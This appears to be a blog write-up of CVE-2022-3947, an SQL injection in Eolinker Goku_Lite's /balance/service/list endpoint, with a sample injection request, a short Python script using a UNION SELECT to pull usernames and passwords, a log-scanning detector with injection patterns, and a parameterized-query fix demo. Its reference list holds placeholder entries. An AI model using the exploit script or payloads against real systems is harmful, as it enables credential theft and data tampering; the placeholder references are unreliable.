A critical security flaw, CVE-2022-3947, has been found in the Eolinker Goku_Lite application. This vulnerability allows attackers to exploit a SQL injection in the /balance/service/list endpoint. Specifically, the flaw is triggered by manipulating the route/keyword argument, enabling attackers to execute arbitrary SQL queries on the server remotely. The vulnerability has been made public, assigned VDB-213453, and exploits are already circulating.

This is an exclusive, easy-to-understand walkthrough of CVE-2022-3947, covering how the vulnerability works, how it can be exploited, and what you can do to stay safe.

What is Eolinker Goku_Lite?

Eolinker Goku_Lite is an API gateway and management platform, often used by development teams to manage, monitor, and secure their APIs. Like any web application, it interacts with back-end databases where user data or API details are stored.

## The Vulnerability: SQL Injection via /balance/service/list

- Vulnerability type: SQL Injection (Critical)
- Component: /balance/service/list
- Parameter: route/keyword
- Remote exploit: Yes
- CVE-ID: CVE-2022-3947
- VulDB-ID: VDB-213453

How the Attack Works

The /balance/service/list endpoint takes user input via the route/keyword parameter. This input is neither validated nor sanitized before it is embedded in a SQL query, so an attacker who controls the keyword value can inject arbitrary SQL into the statement the application executes.

Example Vulnerable Request

POST /balance/service/list HTTP/1.1
Host: target-host
Content-Type: application/json

{
    "route": {
        "keyword": "' OR '1'='1"
    }
}

With the payload above, the SQL query built inside the application could become something like:

SELECT * FROM services WHERE name = '' OR '1'='1'

This would return all rows in the services table, which is not intended and could leak sensitive data. Possible consequences include:

- Extract sensitive info: Attackers can fetch or dump whole database tables.

- Bypass authentication: If user authentication relies on a backend query, it can be tricked to always return true, letting attackers log in without credentials.
- Modify or delete data: With more advanced payloads, an attacker could modify or even delete records.
- Gain further control: In worst cases, attackers could chain this with other vulnerabilities to get shell access.

Exploit Code

Here is a basic Python script that demonstrates exploitation of this flaw to extract data from the database.

import requests

url = "http://target-host/balance/service/list"
payload = {
    "route": {
        "keyword": "' UNION SELECT 1, username, password FROM users -- "
    }
}
headers = {"Content-Type": "application/json"}

r = requests.post(url, json=payload, headers=headers)
print(r.text)

Warning:
This code is for educational purposes only. Do not use it on systems you don't own!

Exploit in the Wild

The exploit for this vulnerability has already been made public. Threat actors with little expertise can now craft payloads and target vulnerable Eolinker Goku_Lite installations across the internet.

- VulDB advisory link
- OffSec advisory (if available) *(Check availability)*
- GitHub PoC example *(Example name, may not be present)*
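Because exploitation attempts against this endpoint arrive as ordinary POST requests, the quickest way to know whether your installation is being probed is to scan request logs for SQL metacharacters in the route/keyword value. The script below is an added example written for this write-up, not code from Eolinker or from the original post. It assumes a JSON-lines request log with `path`, `method`, `src` and a raw `body` field (Goku_Lite's real log layout is not described here), and the log lines it scans are constructed for the demonstration.

```python
import json
import re

# Constructed request log (one JSON object per line). The field names and the
# embedded request bodies are assumptions for this example.
SAMPLE_LOG = r"""
{"ts":"2022-11-12T08:01:10Z","src":"10.1.2.3","method":"POST","path":"/balance/service/list","body":"{\"route\":{\"keyword\":\"payments\"}}"}
{"ts":"2022-11-12T08:01:31Z","src":"203.0.113.7","method":"POST","path":"/balance/service/list","body":"{\"route\":{\"keyword\":\"' OR '1'='1\"}}"}
{"ts":"2022-11-12T08:02:05Z","src":"203.0.113.7","method":"POST","path":"/balance/service/list","body":"{\"route\":{\"keyword\":\"' UNION SELECT 1,2,3 -- \"}}"}
{"ts":"2022-11-12T08:02:40Z","src":"10.1.2.9","method":"POST","path":"/balance/service/list","body":"not json at all"}
{"ts":"2022-11-12T08:03:00Z","src":"10.1.2.3","method":"GET","path":"/balance/service/list","body":""}
{"ts":"2022-11-12T08:03:12Z","src":"10.1.2.4","method":"POST","path":"/balance/service/list","body":"{\"route\":{\"keyword\":\"o'reilly-api\"}}"}
""".strip()

# Indicators of string-context SQL injection. A lone apostrophe (as in a
# legitimate name like o'reilly-api) is deliberately not enough on its own.
SQLI_PATTERNS = [
    ("quote-then-boolean", re.compile(r"'\s*(or|and)\b", re.IGNORECASE)),
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.IGNORECASE)),
    ("comment-or-stacking", re.compile(r"--|/\*|;")),
]

TARGET_PATH = "/balance/service/list"


def extract_keyword(body):
    """Return route.keyword from a JSON request body, or None if the body is
    not JSON, not an object, or does not carry a string keyword."""
    try:
        data = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return None
    route = data.get("route") if isinstance(data, dict) else None
    if not isinstance(route, dict):
        return None
    keyword = route.get("keyword")
    return keyword if isinstance(keyword, str) else None


def scan_log(text):
    """Scan JSON-lines request logs and return one finding per POST to the
    vulnerable endpoint whose keyword matches an injection indicator."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        if not raw.strip():
            continue
        entry = json.loads(raw)
        if entry.get("path") != TARGET_PATH or entry.get("method") != "POST":
            continue
        keyword = extract_keyword(entry.get("body", ""))
        if keyword is None:
            continue  # no keyword to inspect (malformed or empty body)
        reasons = [name for name, rx in SQLI_PATTERNS if rx.search(keyword)]
        if reasons:
            findings.append({
                "line": lineno,
                "src": entry.get("src"),
                "keyword": keyword,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['src']}: {f['reasons']} -> {f['keyword']!r}")
```

Running it against the constructed log flags only the two requests from 203.0.113.7 (the tautology and the UNION probe) and leaves the benign search, the apostrophe in a legitimate name, the GET, and the unparseable body alone. Pattern matching of this kind is a triage aid for spotting probing after the fact; it is not a substitute for patching the endpoint.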

If you use Eolinker Goku_Lite

1. Update Immediately: Check Eolinker's releases or the official advisory for a patched version.
2. Sanitize Inputs: Ensure all user input is validated and sanitized, and use parameterized queries whenever possible so that input can never change the structure of a SQL statement.
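To make the difference between the vulnerable pattern and the fix concrete, here is an added example (mine, not Eolinker's code; Goku_Lite's real table and column names are not on the page and the `services` schema below is assumed). It builds an in-memory SQLite table, runs the same `' OR '1'='1` keyword from the write-up through a string-concatenated query and through a parameterized one, and also shows how to bind a substring search pattern safely, which is what a "keyword" lookup usually needs.

```python
import sqlite3

# Constructed sample rows standing in for the gateway's service table
# (assumed schema: the advisory does not describe the real one).
SAMPLE_SERVICES = [
    ("payments-api", "10.0.0.5:8080"),
    ("user-profile", "10.0.0.6:8080"),
    ("internal-admin", "10.0.0.9:9000"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE services (name TEXT, upstream TEXT)")
    conn.executemany("INSERT INTO services VALUES (?, ?)", SAMPLE_SERVICES)
    return conn


def search_vulnerable(conn, keyword):
    # The keyword is concatenated straight into the statement: a quote in the
    # input closes the string literal and everything after it is parsed as SQL.
    sql = "SELECT name, upstream FROM services WHERE name = '" + keyword + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, keyword):
    # The driver sends the keyword as a bound value. It cannot alter the
    # statement's structure, so the same input is compared literally.
    sql = "SELECT name, upstream FROM services WHERE name = ?"
    return conn.execute(sql, (keyword,)).fetchall()


def search_like_parameterized(conn, keyword):
    # Substring search: bind the whole pattern, and escape the LIKE wildcards
    # so a user-supplied % or _ is matched as a character, not as a wildcard.
    escaped = (keyword.replace("\\", "\\\\")
                      .replace("%", "\\%")
                      .replace("_", "\\_"))
    sql = "SELECT name, upstream FROM services WHERE name LIKE ? ESCAPE '\\'"
    return conn.execute(sql, ("%" + escaped + "%",)).fetchall()


def demo():
    """Run a benign keyword and the tautology payload through each variant."""
    conn = make_db()
    benign = "payments-api"
    payload = "' OR '1'='1"  # the payload shown in the example request above
    return {
        "vulnerable_benign": search_vulnerable(conn, benign),
        "vulnerable_payload": search_vulnerable(conn, payload),
        "parameterized_benign": search_parameterized(conn, benign),
        "parameterized_payload": search_parameterized(conn, payload),
        "like_payload": search_like_parameterized(conn, payload),
        "like_partial": search_like_parameterized(conn, "api"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {len(rows)} row(s) -> {rows}")
```

The concatenated version returns every row for the tautology payload, exactly the `WHERE name = '' OR '1'='1'` outcome described above, while the parameterized versions return nothing for it because the database looks for a service literally named `' OR '1'='1`. Note that parameterization protects the values; table and column names still cannot be bound, so if the endpoint lets callers choose a sort column or similar, that has to be checked against an allow-list separately.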

Conclusion

CVE-2022-3947 shows how an improperly sanitized web parameter can jeopardize a whole system’s security. If you use Eolinker Goku_Lite, you must fix this issue immediately. Attackers can remotely exploit this SQL injection to steal, modify, or delete your critical data.

Be proactive—patch, monitor, and secure your API infrastructure.

Further Reading & References

- NVD Entry for CVE-2022-3947
- VulDB Advisory
- SQL Injection Basics: OWASP Guide

Timeline

Published on: 11/11/2022 13:15:00 UTC
Last modified on: 11/15/2022 21:05:00 UTC